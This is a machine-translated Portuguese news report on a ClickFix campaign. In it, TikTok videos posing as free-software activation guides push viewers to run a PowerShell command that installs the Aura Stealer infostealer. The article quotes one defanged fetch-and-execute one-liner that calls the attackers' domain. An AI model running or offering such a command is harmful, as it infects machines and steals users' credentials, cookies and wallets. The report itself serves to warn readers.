Jens Kalaene/dpa-Zentralbild/dpa - Arquivo
MADRID 20 out. (EUROPA PRESS) -
Uma campanha de cibercriminosos está usando a plataforma TikTok para compartilhar vídeos que alegam ser guias para acesso gratuito a softwares pagos, como o Windows ou plataformas como a Netflix, mas que na verdade são ataques ClickFix, que distribuem malware e permitem que as informações dos usuários sejam roubadas.
Os agentes mal-intencionados veem a plataforma de vídeos curtos da ByteDance como um canal de comunicação para técnicas de engenharia social, pois é um espaço em que usuários de todas as idades costumam acessar todos os tipos de conteúdo, seja para entretenimento ou para pesquisar informações específicas sobre determinados tópicos.
Entre esse conteúdo, os vídeos são compartilhados como guias para obter acesso gratuito a determinados serviços que normalmente são pagos, bem como para ativar algumas funções especiais de "software", por exemplo, nos programas Windows ou Microsoft 365, bem como no Adobe Photoshop, ou em plataformas de assinatura como Netflix ou Spotify.
A esse respeito, o chefe do SANS Internet Storm Center (ISC), Xavier Mertens, responsável pelo programa global de monitoramento e alerta de ameaças cibernéticas, alertou sobre uma campanha identificada no TikTok, na qual os cibercriminosos usam esse tipo de vídeo como uma farsa para realizar ataques ClickFix.
Especificamente, os ataques ClickFix são uma técnica de engenharia social baseada em mostrar a solução para supostos problemas técnicos por meio de, por exemplo, uma janela pop-up. Os usuários geralmente precisam passar por várias etapas para concluir essas soluções, que na realidade servem para manipular as vítimas e convencê-las a executar um script mal-intencionado.
Assim, no caso da campanha identificada no TikTok, os cibercriminosos utilizam os referidos vídeos para, sob a premissa de desbloqueio de software gratuito, enganar os usuários para que executem comandos maliciosos do PowerShell ou mesmo outros scripts que acabam infectando o dispositivo em execução com malware.
Conforme detalhado por Mertens em uma declaração no site da ISC e verificado pela Bleeping Computer, cada vídeo inclui um comando curto de uma linha (por exemplo, 'iex (irm slmgr[.]win/photoshop', no caso de um vídeo direcionado ao Photoshop) que os usuários supostamente precisam executar como administrador no PowerShell para obter os resultados garantidos no vídeo.
No entanto, trata-se, na verdade, de um código malicioso que infecta o dispositivo e se conecta ao site remoto 'slmgr[.]win' para recuperar e executar outro script do PowerShell. Esse script, por sua vez, baixa dois executáveis, um dos quais é uma variante do malware de roubo de informações Aura Stealer.
Dessa forma, os agentes mal-intencionados usam o Aura Stealer para coletar informações, como credenciais de login de senha armazenadas em navegadores, cookies de autenticação ou até mesmo carteiras de criptomoedas dos usuários.
Da mesma forma, o especialista em segurança cibernética do ISE observou que o segundo executável é dedicado à compilação de código sob demanda, embora o objetivo final dessa carga útil seja desconhecido.
Como resultado, a Bleeping Computer lembrou aos usuários que os usuários que realizarem todas as etapas explicadas nesse tipo de vídeo no TikTok verão todas as suas credenciais comprometidas, portanto, terão que redefinir as senhas de todos os sites que visitam por motivos de segurança.
Esta notícia foi traduzida por um tradutor automático